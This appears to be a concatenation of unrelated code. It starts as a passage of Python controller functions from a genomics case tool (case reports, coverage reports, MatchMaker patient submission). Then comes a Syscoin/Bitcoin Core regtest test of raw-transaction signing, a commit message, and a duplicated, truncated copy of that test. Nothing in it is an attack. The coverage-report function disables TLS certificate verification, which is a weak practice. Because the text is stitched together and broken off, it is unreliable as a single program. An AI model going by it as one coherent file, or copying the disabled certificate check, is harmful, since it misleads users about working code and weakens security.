'other_causatives': store.check_causatives(case_obj=case_obj),
'comments': store.events(institute_obj, case=case_obj, comments=True),
'hpo_groups': pheno_groups,
'events': events,
'suspects': suspects,
'causatives': causatives,
'partial_causatives' : partial_causatives,
'collaborators': collab_ids,
'cohort_tags': COHORT_TAGS,
}
return data
def case_report_content(store, institute_obj, case_obj):
"""Gather contents to be visualized in a case report
Args:
store(adapter.MongoAdapter)
institute_obj(models.Institute)
case_obj(models.Case)
Returns:
data(dict)
"""
variant_types = {
'causatives_detailed': 'causatives',
'suspects_detailed': 'suspects',
'classified_detailed': 'acmg_classification',
'tagged_detailed': 'manual_rank',
'dismissed_detailed': 'dismiss_variant',
'commented_detailed': 'is_commented',
}
data = case_obj
for individual in data['individuals']:
try:
sex = int(individual.get('sex', 0))
except ValueError as err:
sex = 0
individual['sex_human'] = SEX_MAP[sex]
individual['phenotype_human'] = PHENOTYPE_MAP.get(individual['phenotype'])
# Add the case comments
data['comments'] = store.events(institute_obj, case=case_obj, comments=True)
data['manual_rank_options'] = MANUAL_RANK_OPTIONS
data['dismissed_options'] = DISMISS_VARIANT_OPTIONS
data['genetic_models'] = dict(GENETIC_MODELS)
data['report_created_at'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M")
evaluated_variants = {vt:[] for vt in variant_types}
# We collect all causatives and suspected variants
# These are handeled in separate since they are on case level
for var_type in ['causatives', 'suspects']:
#These include references to variants
vt = '_'.join([var_type, 'detailed'])
for var_id in case_obj.get(var_type,[]):
variant_obj = store.variant(var_id)
if not variant_obj:
continue
# If the variant exists we add it to the evaluated variants
evaluated_variants[vt].append(variant_obj)
## get variants for this case that are either classified, commented, tagged or dismissed.
for var_obj in store.evaluated_variants(case_id=case_obj['_id']):
# Check which category it belongs to
for vt in variant_types:
keyword = variant_types[vt]
# When found we add it to the categpry
# Eac variant can belong to multiple categories
if keyword not in var_obj:
continue
evaluated_variants[vt].append(var_obj)
for var_type in evaluated_variants:
decorated_variants = []
for var_obj in evaluated_variants[var_type]:
# We decorate the variant with some extra information
decorated_info = variant_decorator(
store=store,
institute_id=institute_obj['_id'],
case_name=case_obj['display_name'],
variant_id=None,
variant_obj=var_obj,
add_case=False,
add_other=False,
get_overlapping=False,
add_compounds=False,
variant_type=var_obj['category'],
institute_obj=institute_obj,
case_obj=case_obj,
)
decorated_variants.append(decorated_info['variant'])
# Add the decorated variants to the case
data[var_type] = decorated_variants
return data
def coverage_report_contents(store, institute_obj, case_obj, base_url):
"""Posts a request to chanjo-report and capture the body of the returned response to include it in case report
Args:
store(adapter.MongoAdapter)
institute_obj(models.Institute)
case_obj(models.Case)
base_url(str): base url of server
Returns:
coverage_data(str): string rendering of the content between <body </body> tags of a coverage report
"""
request_data = {}
# extract sample ids from case_obj and add them to the post request object:
request_data['sample_id'] = [ ind['individual_id'] for ind in case_obj['individuals'] ]
# extract default panel names and default genes from case_obj and add them to the post request object
distinct_genes = set()
panel_names = []
for panel_info in case_obj.get('panels', [ ]):
if panel_info.get('is_default') is False:
continue
panel_obj = store.gene_panel(panel_info['panel_name'], version=panel_info.get('version'))
distinct_genes.update([gene['hgnc_id'] for gene in panel_obj.get('genes', [])])
full_name = "{} ({})".format(panel_obj['display_name'], panel_obj['version'])
panel_names.append(full_name)
panel_names = ' ,'.join(panel_names)
request_data['gene_ids'] = ','.join([str(gene_id) for gene_id in list(distinct_genes)])
request_data['panel_name'] = panel_names
request_data['request_sent'] = datetime.datetime.now()
# add institute-specific cutoff level to the post request object
request_data['level'] = institute_obj.get('coverage_cutoff', 15)
#send get request to chanjo report
#disable default certificate verification
resp = requests.post(base_url+'reports/report', data=request_data, verify=False)
#read response content
soup = BeautifulSoup(resp.text)
# remove links in the printed version of coverage report
for tag in soup.find_all('a'):
tag.replaceWith('')
#extract body content using BeautifulSoup
coverage_data = ''.join(['%s' % x for x in soup.body.contents])
return coverage_data
def clinvar_submissions(store, user_id, institute_id):
"""Get all Clinvar submissions for a user and an institute"""
submissions = list(store.clinvar_submissions(user_id, institute_id))
return submissions
def clinvar_header(submission_objs, csv_type):
""" Call clinvar parser to extract required fields to include in csv header from clinvar submission objects"""
clinvar_header_obj = clinvar_submission_header(submission_objs, csv_type)
return clinvar_header_obj
def clinvar_lines(clinvar_objects, clinvar_header):
""" Call clinvar parser to extract required lines to include in csv file from clinvar submission objects and header"""
clinvar_lines = clinvar_submission_lines(clinvar_objects, clinvar_header)
return clinvar_lines
def mt_excel_files(store, case_obj, temp_excel_dir):
"""Collect MT variants and format line of a MT variant report
to be exported in excel format
Args:
store(adapter.MongoAdapter)
case_obj(models.Case)
temp_excel_dir(os.Path): folder where the temp excel files are written to
Returns:
written_files(int): the number of files written to temp_excel_dir
"""
today = datetime.datetime.now().strftime('%Y-%m-%d')
samples = case_obj.get('individuals')
query = {'chrom':'MT'}
mt_variants = list(store.variants(case_id=case_obj['_id'], query=query, nr_of_variants= -1, sort_key='position'))
written_files = 0
for sample in samples:
sample_id = sample['individual_id']
display_name = sample['display_name']
sample_lines = export_mt_variants(variants=mt_variants, sample_id=sample_id)
# set up document name
document_name = '.'.join([case_obj['display_name'], display_name, today]) + '.xlsx'
workbook = Workbook(os.path.join(temp_excel_dir,document_name))
Report_Sheet = workbook.add_worksheet()
# Write the column header
row = 0
for col,field in enumerate(MT_EXPORT_HEADER):
Report_Sheet.write(row,col,field)
# Write variant lines, after header (start at line 1)
for row, line in enumerate(sample_lines,1): # each line becomes a row in the document
for col, field in enumerate(line): # each field in line becomes a cell
Report_Sheet.write(row,col,field)
workbook.close()
if os.path.exists(os.path.join(temp_excel_dir,document_name)):
written_files += 1
return written_files
def update_synopsis(store, institute_obj, case_obj, user_obj, new_synopsis):
"""Update synopsis."""
# create event only if synopsis was actually changed
if case_obj['synopsis'] != new_synopsis:
link = url_for('cases.case', institute_id=institute_obj['_id'],
case_name=case_obj['display_name'])
store.update_synopsis(institute_obj, case_obj, user_obj, link,
content=new_synopsis)
def hpo_diseases(username, password, hpo_ids, p_value_treshold=1):
"""Return the list of HGNC symbols that match annotated HPO terms.
Args:
username (str): username to use for phenomizer connection
password (str): password to use for phenomizer connection
Returns:
query_result: a generator of dictionaries on the form
{
'p_value': float,
'disease_source': str,
'disease_nr': int,
'gene_symbols': list(str),
'description': str,
'raw_line': str
}
"""
# skip querying Phenomizer unless at least one HPO terms exists
try:
results = query_phenomizer.query(username, password, *hpo_ids)
diseases = [result for result in results
if result['p_value'] <= p_value_treshold]
return diseases
except SystemExit:
return None
def rerun(store, mail, current_user, institute_id, case_name, sender, recipient):
"""Request a rerun by email."""
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
user_obj = store.user(current_user.email)
link = url_for('cases.case', institute_id=institute_id, case_name=case_name)
store.request_rerun(institute_obj, case_obj, user_obj, link)
# this should send a JSON document to the SuSy API in the future
html = """
<p>{institute}: {case} ({case_id})</p>
<p>Re-run requested by: {name}</p>
""".format(institute=institute_obj['display_name'],
case=case_obj['display_name'], case_id=case_obj['_id'],
name=user_obj['name'].encode())
# compose and send the email message
msg = Message(subject=("SCOUT: request RERUN for {}"
.format(case_obj['display_name'])),
html=html, sender=sender, recipients=[recipient],
# cc the sender of the email for confirmation
cc=[user_obj['email']])
if recipient:
mail.send(msg)
else:
LOG.error("Cannot send rerun message: no recipient defined in config.")
def update_default_panels(store, current_user, institute_id, case_name, panel_ids):
"""Update default panels for a case."""
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
user_obj = store.user(current_user.email)
link = url_for('cases.case', institute_id=institute_id, case_name=case_name)
panel_objs = [store.panel(panel_id) for panel_id in panel_ids]
store.update_default_panels(institute_obj, case_obj, user_obj, link, panel_objs)
def update_clinical_filter_hpo(store, current_user, institute_id, case_name, hpo_clinical_filter):
"""Update HPO clinical filter use for a case."""
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
user_obj = store.user(current_user.email)
link = url_for('cases.case', institute_id=institute_id, case_name=case_name)
store.update_clinical_filter_hpo(institute_obj, case_obj, user_obj, link, hpo_clinical_filter)
def vcf2cytosure(store, institute_id, case_name, individual_id):
"""vcf2cytosure CGH file for inidividual."""
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
for individual in case_obj['individuals']:
if individual['individual_id'] == individual_id:
individual_obj = individual
return (individual_obj['display_name'], individual_obj['vcf2cytosure'])
def gene_variants(store, variants_query, institute_id, page=1, per_page=50):
"""Pre-process list of variants."""
# We need to call variants_collection.count_documents here
variant_count = variants_query.count()
skip_count = per_page * max(page - 1, 0)
more_variants = True if variant_count > (skip_count + per_page) else False
variant_res = variants_query.skip(skip_count).limit(per_page)
my_institutes = list(inst['_id'] for inst in user_institutes(store, current_user))
variants = []
for variant_obj in variant_res:
# hide other institutes for now
if variant_obj['institute'] not in my_institutes:
LOG.warning("Institute {} not allowed.".format(variant_obj['institute']))
continue
# Populate variant case_display_name
variant_case_obj = store.case(case_id=variant_obj['case_id'])
if not variant_case_obj:
# A variant with missing case was encountered
continue
case_display_name = variant_case_obj.get('display_name')
variant_obj['case_display_name'] = case_display_name
genome_build = variant_case_obj.get('genome_build', '37')
if genome_build not in ['37','38']:
genome_build = '37'
# Update the HGNC symbols if they are not set
variant_genes = variant_obj.get('genes')
if variant_genes is not None:
for gene_obj in variant_genes:
# If there is no hgnc id there is nothin we can do
if not gene_obj['hgnc_id']:
continue
# Else we collect the gene object and check the id
if gene_obj.get('hgnc_symbol') is None or gene_obj.get('description') is None:
hgnc_gene = store.hgnc_gene(gene_obj['hgnc_id'], build=genome_build)
if not hgnc_gene:
continue
gene_obj['hgnc_symbol'] = hgnc_gene['hgnc_symbol']
gene_obj['description'] = hgnc_gene['description']
# Populate variant HGVS and predictions
gene_ids = []
gene_symbols = []
hgvs_c = []
hgvs_p = []
variant_genes = variant_obj.get('genes')
if variant_genes is not None:
functional_annotation = ''
for gene_obj in variant_genes:
hgnc_id = gene_obj['hgnc_id']
gene_symbol = gene(store, hgnc_id)['symbol']
gene_ids.append(hgnc_id)
gene_symbols.append(gene_symbol)
hgvs_nucleotide = '-'
# gather HGVS info from gene transcripts
transcripts_list = gene_obj.get('transcripts')
for transcript_obj in transcripts_list:
if transcript_obj.get('is_canonical') and transcript_obj.get('is_canonical') is True:
hgvs_nucleotide = str(transcript_obj.get('coding_sequence_name'))
hgvs_protein = str(transcript_obj.get('protein_sequence_name'))
hgvs_c.append(hgvs_nucleotide)
hgvs_p.append(hgvs_protein)
if len(gene_symbols) == 1:
if(hgvs_p[0] != "None"):
hgvs = hgvs_p[0]
elif(hgvs_c[0] != "None"):
hgvs = hgvs_c[0]
else:
hgvs = "-"
variant_obj['hgvs'] = hgvs
# populate variant predictions for display
variant_obj.update(predictions(variant_genes))
variants.append(variant_obj)
return {
'variants': variants,
'more_variants': more_variants,
}
def multiqc(store, institute_id, case_name):
"""Find MultiQC report for the case."""
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
return dict(
institute=institute_obj,
case=case_obj,
)
def get_sanger_unevaluated(store, institute_id, user_id):
"""Get all variants for an institute having Sanger validations ordered but still not evaluated
Args:
store(scout.adapter.MongoAdapter)
institute_id(str)
Returns:
unevaluated: a list that looks like this: [ {'case1': [varID_1, varID_2, .., varID_n]}, {'case2' : [varID_1, varID_2, .., varID_n]} ],
where the keys are case_ids and the values are lists of variants with Sanger ordered but not yet validated
"""
# Retrieve a list of ids for variants with Sanger ordered grouped by case from the 'event' collection
# This way is much faster than querying over all variants in all cases of an institute
sanger_ordered_by_case = store.sanger_ordered(institute_id, user_id)
unevaluated = []
# for each object where key==case and value==[variant_id with Sanger ordered]
for item in sanger_ordered_by_case:
case_id = item['_id']
# Get the case to collect display name
case_obj = store.case(case_id=case_id)
if not case_obj: # the case might have been removed
continue
case_display_name = case_obj.get('display_name')
# List of variant document ids
varid_list = item['vars']
unevaluated_by_case = {}
unevaluated_by_case[case_display_name] = []
for var_id in varid_list:
# For each variant with sanger validation ordered
variant_obj = store.variant(document_id=var_id, case_id=case_id)
# Double check that Sanger was ordered (and not canceled) for the variant
if variant_obj is None or variant_obj.get('sanger_ordered') is None or variant_obj.get('sanger_ordered') is False:
continue
validation = variant_obj.get('validation', 'not_evaluated')
# Check that the variant is not evaluated
if validation in ['True positive', 'False positive']:
continue
unevaluated_by_case[case_display_name].append(variant_obj['_id'])
# If for a case there is at least one Sanger validation to evaluate add the object to the unevaluated objects list
if len(unevaluated_by_case[case_display_name]) > 0:
unevaluated.append(unevaluated_by_case)
return unevaluated
def mme_add(store, user_obj, case_obj, add_gender, add_features, add_disorders, genes_only,
mme_base_url, mme_accepts, mme_token):
"""Add a patient to MatchMaker server
Args:
store(adapter.MongoAdapter)
user_obj(dict) a scout user object (to be added as matchmaker contact)
case_obj(dict) a scout case object
add_gender(bool) if True case gender will be included in matchmaker
add_features(bool) if True HPO features will be included in matchmaker
add_disorders(bool) if True OMIM diagnoses will be included in matchmaker
genes_only(bool) if True only genes and not variants will be shared
mme_base_url(str) base url of the MME server
mme_accepts(str) request content accepted by MME server
mme_token(str) auth token of the MME server
Returns:
submitted_info(dict) info submitted to MatchMaker and its responses
"""
if not mme_base_url or not mme_accepts or not mme_token:
return 'Please check that Matchmaker connection parameters are valid'
url = ''.join([mme_base_url, '/patient/add'])
features = [] # this is the list of HPO terms
disorders = [] # this is the list of OMIM diagnoses
g_features = []
# create contact dictionary
contact_info = {
'name' : user_obj['name'],
'href' : ''.join( ['mailto:',user_obj['email']] ),
'institution' : 'Scout software user, Science For Life Laboratory, Stockholm, Sweden'
}
if add_features: # create features dictionaries
features = hpo_terms(case_obj)
if add_disorders: # create OMIM disorders dictionaries
disorders = omim_terms(case_obj)
# send a POST request and collect response for each affected individual in case
server_responses = []
submitted_info = {
'contact' : contact_info,
'sex' : add_gender,
'features' : features,
'disorders' : disorders,
'genes_only' : genes_only,
'patient_id' : []
}
for individual in case_obj.get('individuals'):
if not individual['phenotype'] in [2, 'affected']: # include only affected individuals
continue
patient = {
'contact' : contact_info,
'id' : '.'.join([case_obj['_id'], individual.get('individual_id')]), # This is a required field form MME
'label' : '.'.join([case_obj['display_name'], individual.get('display_name')]),
'features' : features,
'disorders' : disorders
}
if add_gender:
if individual['sex'] == '1':
patient['sex'] = 'MALE'
else:
patient['sex'] = 'FEMALE'
if case_obj.get('suspects'):
g_features = genomic_features(store, case_obj, individual.get('display_name'), genes_only)
patient['genomicFeatures'] = g_features
# send add request to server and capture response
resp = matchmaker_request(url=url, token=mme_token, method='POST', content_type=mme_accepts,
accept='application/json', data={'patient':patient})
server_responses.append({
'patient': patient,
'message': resp.get('message'),
'status_code' : resp.get('status_code')
})
submitted_info['server_responses'] = server_responses
return submitted_info
def mme_delete(case_obj, mme_base_url, mme_token):
"""Delete all affected samples for a case from MatchMaker
Args:
case_obj(dict) a scout case object
mme_base_url(str) base url of the MME server
mme_token(str) auth token of the MME server
Returns:
server_responses(list): a list of object of this type:
{
'patient_id': patient_id
'message': server_message,
'status_code': server_status_code
}
"""
server_responses = []
if not mme_base_url or not mme_token:
return 'Please check that Matchmaker connection parameters are valid'
# for each patient of the case in matchmaker
for patient in case_obj['mme_submission']['patients']:
# send delete request to server and capture server's response
patient_id = patient['id']
url = ''.join([mme_base_url, '/patient/delete/', patient_id])
resp = matchmaker_request(url=url, token=mme_token, method='DELETE', )
server_responses.append({
'patient_id': patient_id,
'message': resp.get('message'),
'status_code': resp.get('status_code')
})
return server_responses
def mme_matches(case_obj, institute_obj, mme_base_url, mme_token):
"""Show Matchmaker submission data for a sample and eventual matches.
Args:
case_obj(dict): a scout case object
institute_obj(dict): an institute object
mme_base_url(str) base url of the MME server
mme_token(str) auth token of the MME server
Returns:
data(dict): data to display in the html template
"""
data = {
'institute' : institute_obj,
'case' : case_obj,
'server_errors' : []
}
matches = {}
# loop over the submitted samples and get matches from the MatchMaker server
if not case_obj.get('mme_submission'):
return None
for patient in case_obj['mme_submission']['patients']:
patient_id = patient['id']
matches[patient_id] = None
url = ''.join([ mme_base_url, '/matches/', patient_id])
server_resp = matchmaker_request(url=url, token=mme_token, method='GET')
if 'status_code' in server_resp: # the server returned a valid response
# and this will be a list of match objects sorted by desc date
pat_matches = []
if server_resp.get('matches'):
pat_matches = parse_matches(patient_id, server_resp['matches'])
matches[patient_id] = pat_matches
else:
LOG.warning('Server returned error message: {}'.format(server_resp['message']))
data['server_errors'].append(server_resp['message'])
data['matches'] = matches
return data
def mme_match(case_obj, match_type, mme_base_url, mme_token, nodes=None, mme_accepts=None):
"""Initiate a MatchMaker match against either other Scout patients or external nodes
Args:
case_obj(dict): a scout case object already submitted to MME
match_type(str): 'internal' or 'external'
mme_base_url(str): base url of the MME server
mme_token(str): auth token of the MME server
mme_accepts(str): request content accepted by MME server (only for internal matches)
Returns:
matches(list): a list of eventual matches
"""
query_patients = []
server_responses = []
url = None
# list of patient dictionaries is required for internal matching
query_patients = case_obj['mme_submission']['patients']
if match_type=='internal':
url = ''.join([mme_base_url,'/match'])
for patient in query_patients:
json_resp = matchmaker_request(url=url, token=mme_token, method='POST',
content_type=mme_accepts, accept=mme_accepts, data={'patient':patient})
resp_obj = {
'server' : 'Local MatchMaker node',
'patient_id' : patient['id'],
'results' : json_resp.get('results'),
'status_code' : json_resp.get('status_code'),
'message' : json_resp.get('message') # None if request was successful
}
server_responses.append(resp_obj)
else: # external matching
# external matching requires only patient ID
query_patients = [ patient['id'] for patient in query_patients]
node_ids = [ node['id'] for node in nodes ]
if match_type in node_ids: # match is against a specific external node
node_ids = [match_type]
# Match every affected patient
for patient in query_patients:
# Against every node
for node in node_ids:
url = ''.join([mme_base_url,'/match/external/', patient, '?node=', node])
json_resp = matchmaker_request(url=url, token=mme_token, method='POST')
resp_obj = {
'server' : node,
'patient_id' : patient,
'results' : json_resp.get('results'),
'status_code' : json_resp.get('status_code'),
'message' : json_resp.get('message') # None if request was successful
}
server_responses.append(resp_obj)
return server_responses
|
#!/usr/bin/env python3
# Copyright (c) 2015-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test transaction signing using the signrawtransaction* RPCs."""
from test_framework.address import check_script, script_to_p2sh
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error, find_vout_for_address, hex_str_to_bytes
from test_framework.messages import sha256
from test_framework.script import CScript, OP_0, OP_CHECKSIG
from decimal import Decimal
class SignRawTransactionsTest(SyscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def successful_signing_test(self):
"""Create and sign a valid raw transaction with one input.
Expected results:
1) The transaction has a complete set of signatures
2) No script verification error occurred"""
privKeys = ['cUeKHd5orzT3mz8P9pxyREHfsWtVfgsfDjiZZBcjUBAaGk1BTj7N', 'cVKpPfVKSJxKqVpE9awvXNWuLHCa5j5tiE7K6zbUSptFpTEtiFrA']
inputs = [
# Valid pay-to-pubkey scripts
{'txid': '9b907ef1e3c26fc71fe4a4b3580bc75264112f95050014157059c736f0202e71', 'vout': 0,
'scriptPubKey': '76a91460baa0f494b38ce3c940dea67f3804dc52d1fb9488ac'},
{'txid': '83a4f6a6b73660e13ee6cb3c6063fa3759c50c9b7521d0536022961898f4fb02', 'vout': 0,
'scriptPubKey': '76a914669b857c03a5ed269d5d85a1ffac9ed5d663072788ac'},
]
outputs = {'mpLQjfK79b7CCV4VMJWEWAj5Mpx8Up5zxB': 0.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
rawTxSigned = self.nodes[0].signrawtransactionwithkey(rawTx, privKeys, inputs)
# 1) The transaction has a complete set of signatures
assert rawTxSigned['complete']
# 2) No script verification error occurred
assert 'errors' not in rawTxSigned
def test_with_lock_outputs(self):
"""Test correct error reporting when trying to sign a locked output"""
self.nodes[0].encryptwallet("password")
rawTx = '020000000156b958f78e3f24e0b2f4e4db1255426b0902027cb37e3ddadb52e37c3557dddb0000000000ffffffff01c0a6b929010000001600149a2ee8c77140a053f36018ac8124a6ececc1668a00000000'
assert_raises_rpc_error(-13, "Please enter the wallet passphrase with walletpassphrase first", self.nodes[0].signrawtransactionwithwallet, rawTx)
def script_verification_error_test(self):
"""Create and sign a raw transaction with valid (vin 0), invalid (vin 1) and one missing (vin 2) input script.
Expected results:
3) The transaction has no complete set of signatures
4) Two script verification errors occurred
5) Script verification errors have certain properties ("txid", "vout", "scriptSig", "sequence", "error")
6) The verification errors refer to the invalid (vin 1) and missing input (vin 2)"""
privKeys = ['cUeKHd5orzT3mz8P9pxyREHfsWtVfgsfDjiZZBcjUBAaGk1BTj7N']
inputs = [
# Valid pay-to-pubkey script
{'txid': '9b907ef1e3c26fc71fe4a4b3580bc75264112f95050014157059c736f0202e71', 'vout': 0},
# Invalid script
{'txid': '5b8673686910442c644b1f4993d8f7753c7c8fcb5c87ee40d56eaeef25204547', 'vout': 7},
# Missing scriptPubKey
{'txid': '9b907ef1e3c26fc71fe4a4b3580bc75264112f95050014157059c736f0202e71', 'vout': 1},
]
scripts = [
# Valid pay-to-pubkey script
{'txid': '9b907ef1e3c26fc71fe4a4b3580bc75264112f95050014157059c736f0202e71', 'vout': 0,
'scriptPubKey': '76a91460baa0f494b38ce3c940dea67f3804dc52d1fb9488ac'},
# Invalid script
{'txid': '5b8673686910442c644b1f4993d8f7753c7c8fcb5c87ee40d56eaeef25204547', 'vout': 7,
'scriptPubKey': 'badbadbadbad'}
]
outputs = {'mpLQjfK79b7CCV4VMJWEWAj5Mpx8Up5zxB': 0.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
# Make sure decoderawtransaction is at least marginally sane
decodedRawTx = self.nodes[0].decoderawtransaction(rawTx)
for i, inp in enumerate(inputs):
assert_equal(decodedRawTx["vin"][i]["txid"], inp["txid"])
assert_equal(decodedRawTx["vin"][i]["vout"], inp["vout"])
# Make sure decoderawtransaction throws if there is extra data
assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].decoderawtransaction, rawTx + "00")
rawTxSigned = self.nodes[0].signrawtransactionwithkey(rawTx, privKeys, scripts)
# 3) The transaction has no complete set of signatures
assert not rawTxSigned['complete']
# 4) Two script verification errors occurred
assert 'errors' in rawTxSigned
assert_equal(len(rawTxSigned['errors']), 2)
# 5) Script verification errors have certain properties
assert 'txid' in rawTxSigned['errors'][0]
assert 'vout' in rawTxSigned['errors'][0]
assert 'witness' in rawTxSigned['errors'][0]
assert 'scriptSig' in rawTxSigned['errors'][0]
assert 'sequence' in rawTxSigned['errors'][0]
assert 'error' in rawTxSigned['errors'][0]
# 6) The verification errors refer to the invalid (vin 1) and missing input (vin 2)
assert_equal(rawTxSigned['errors'][0]['txid'], inputs[1]['txid'])
assert_equal(rawTxSigned['errors'][0]['vout'], inputs[1]['vout'])
assert_equal(rawTxSigned['errors'][1]['txid'], inputs[2]['txid'])
assert_equal(rawTxSigned['errors'][1]['vout'], inputs[2]['vout'])
assert not rawTxSigned['errors'][0]['witness']
# Now test signing failure for transaction with input witnesses
p2wpkh_raw_tx = "01000000000102fff7f7881a8099afa6940d42d1e7f6362bec38171ea3edf433541db4e4ad969f00000000494830450221008b9d1dc26ba6a9cb62127b02742fa9d754cd3bebf337f7a55d114c8e5cdd30be022040529b194ba3f9281a99f2b1c0a19c0489bc22ede944ccf4ecbab4cc618ef3ed01eeffffffef51e1b804cc89d182d279655c3aa89e815b1b309fe287d9b2b55d57b90ec68a0100000000ffffffff02202cb206000000001976a9148280b37df378db99f66f85c95a783a76ac7a6d5988ac9093510d000000001976a9143bde42dbee7e4dbe6a21b2d50ce2f0167faa815988ac000247304402203609e17b84f6a7d30c80bfa610b5b4542f32a8a0d5447a12fb1366d7f01cc44a0220573a954c4518331561406f90300e8f3358f51928d43c212a8caed02de67eebee0121025476c2e83188368da1ff3e292e7acafcdb3566bb0ad253f62fc70f07aeee635711000000"
rawTxSigned = self.nodes[0].signrawtransactionwithwallet(p2wpkh_raw_tx)
# 7) The transaction has no complete set of signatures
assert not rawTxSigned['complete']
# 8) Two script verification errors occurred
assert 'errors' in rawTxSigned
assert_equal(len(rawTxSigned['errors']), 2)
# 9) Script verification errors have certain properties
assert 'txid' in rawTxSigned['errors'][0]
assert 'vout' in rawTxSigned['errors'][0]
assert 'witness' in rawTxSigned['errors'][0]
assert 'scriptSig' in rawTxSigned['errors'][0]
assert 'sequence' in rawTxSigned['errors'][0]
assert 'error' in rawTxSigned['errors'][0]
# Non-empty witness checked here
assert_equal(rawTxSigned['errors'][1]['witness'], ["304402203609e17b84f6a7d30c80bfa610b5b4542f32a8a0d5447a12fb1366d7f01cc44a0220573a954c4518331561406f90300e8f3358f51928d43c212a8caed02de67eebee01", "025476c2e83188368da1ff3e292e7acafcdb3566bb0ad253f62fc70f07aeee6357"])
assert not rawTxSigned['errors'][0]['witness']
def witness_script_test(self):
# Now test signing transaction to P2SH-P2WSH addresses without wallet
# Create a new P2SH-P2WSH 1-of-1 multisig address:
embedded_address = self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress())
embedded_privkey = self.nodes[1].dumpprivkey(embedded_address["address"])
p2sh_p2wsh_address = self.nodes[1].addmultisigaddress(1, [embedded_address["pubkey"]], "", "p2sh-segwit")
# send transaction to P2SH-P2WSH 1-of-1 multisig address
self.nodes[0].generate(101)
self.nodes[0].sendtoaddress(p2sh_p2wsh_address["address"], 49.999)
self.nodes[0].generate(1)
self.sync_all()
# Find the UTXO for the transaction node[1] should have received, check witnessScript matches
unspent_output = self.nodes[1].listunspent(0, 999999, [p2sh_p2wsh_address["address"]])[0]
assert_equal(unspent_output["witnessScript"], p2sh_p2wsh_address["redeemScript"])
p2sh_redeemScript = CScript([OP_0, sha256(hex_str_to_bytes(p2sh_p2wsh_address["redeemScript"]))])
assert_equal(unspent_output["redeemScript"], p2sh_redeemScript.hex())
# Now create and sign a transaction spending that output on node[0], which doesn't know the scripts or keys
spending_tx = self.nodes[0].createrawtransaction([unspent_output], {self.nodes[1].getnewaddress(): Decimal("49.998")})
spending_tx_signed = self.nodes[0].signrawtransactionwithkey(spending_tx, [embedded_privkey], [unspent_output])
# Check the signing completed successfully
assert 'complete' in spending_tx_signed
assert_equal(spending_tx_signed['complete'], True)
self.log.info('Try with a P2PKH script as the witnessScript')
embedded_addr_info = self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress('', 'legacy'))
embedded_privkey = self.nodes[1].dumpprivkey(embedded_addr_info['address'])
witness_script = embedded_addr_info['scriptPubKey']
redeem_script = CScript([OP_0, sha256(check_script(witness_script))]).hex()
addr = script_to_p2sh(redeem_script)
script_pub_key = self.nodes[1].validateaddress(addr)['scriptPubKey']
# Fund that address
txid = self.nodes[0].sendtoaddress(addr, 10)
vout = find_vout_for_address(self.nodes[0], txid, addr)
self.nodes[0].generate(1)
# Now create and sign a transaction spending that output on node[0], which doesn't know the scripts or keys
spending_tx = self.nodes[0].createrawtransaction([{'txid': txid, 'vout': vout}], {self.nodes[1].getnewaddress(): Decimal("9.999")})
spending_tx_signed = self.nodes[0].signrawtransactionwithkey(spending_tx, [embedded_privkey], [{'txid': txid, 'vout': vout, 'scriptPubKey': script_pub_key, 'redeemScript': redeem_script, 'witnessScript': witness_script, 'amount': 10}])
# Check the signing completed successfully
assert 'complete' in spending_tx_signed
assert_equal(spending_tx_signed['complete'], True)
self.nodes[0].sendrawtransaction(spending_tx_signed['hex'])
self.log.info('Try with a P2PK script as the witnessScript')
embedded_addr_info = self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress('', 'legacy'))
embedded_privkey = self.nodes[1].dumpprivkey(embedded_addr_info['address'])
witness_script = CScript([hex_str_to_bytes(embedded_addr_info['pubkey']), OP_CHECKSIG]).hex()
redeem_script = CScript([OP_0, sha256(check_script(witness_script))]).hex()
addr = script_to_p2sh(redeem_script)
script_pub_key = self.nodes[1].validateaddress(addr)['scriptPubKey']
# Fund that address
txid = self.nodes[0].sendtoaddress(addr, 10)
vout = find_vout_for_address(self.nodes[0], txid, addr)
self.nodes[0].generate(1)
# Now create and sign a transaction spending that output on node[0], which doesn't know the scripts or keys
spending_tx = self.nodes[0].createrawtransaction([{'txid': txid, 'vout': vout}], {self.nodes[1].getnewaddress(): Decimal("9.999")})
spending_tx_signed = self.nodes[0].signrawtransactionwithkey(spending_tx, [embedded_privkey], [{'txid': txid, 'vout': vout, 'scriptPubKey': script_pub_key, 'redeemScript': redeem_script, 'witnessScript': witness_script, 'amount': 10}])
# Check the signing completed successfully
assert 'complete' in spending_tx_signed
assert_equal(spending_tx_signed['complete'], True)
self.nodes[0].sendrawtransaction(spending_tx_signed['hex'])
def run_test(self):
self.successful_signing_test()
self.script_verification_error_test()
self.witness_script_test()
self.test_with_lock_outputs()
if __name__ == '__main__':
SignRawTransactionsTest().main()
test: refactor rpc_signrawtransaction witness script tests
to see what is distinct in each test.
Former-commit-id: bfaff9f5b85283d8485fcfd7add5c02d266ab490
#!/usr/bin/env python3
# Copyright (c) 2015-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test transaction signing using the signrawtransaction* RPCs."""
from test_framework.address import check_script, script_to_p2sh
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error, find_vout_for_address, hex_str_to_bytes
from test_framework.messages import sha256
from test_framework.script import CScript, OP_0, OP_CHECKSIG
from decimal import Decimal
class SignRawTransactionsTest(SyscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def successful_signing_test(self):
"""Create and sign a valid raw transaction with one input.
Expected results:
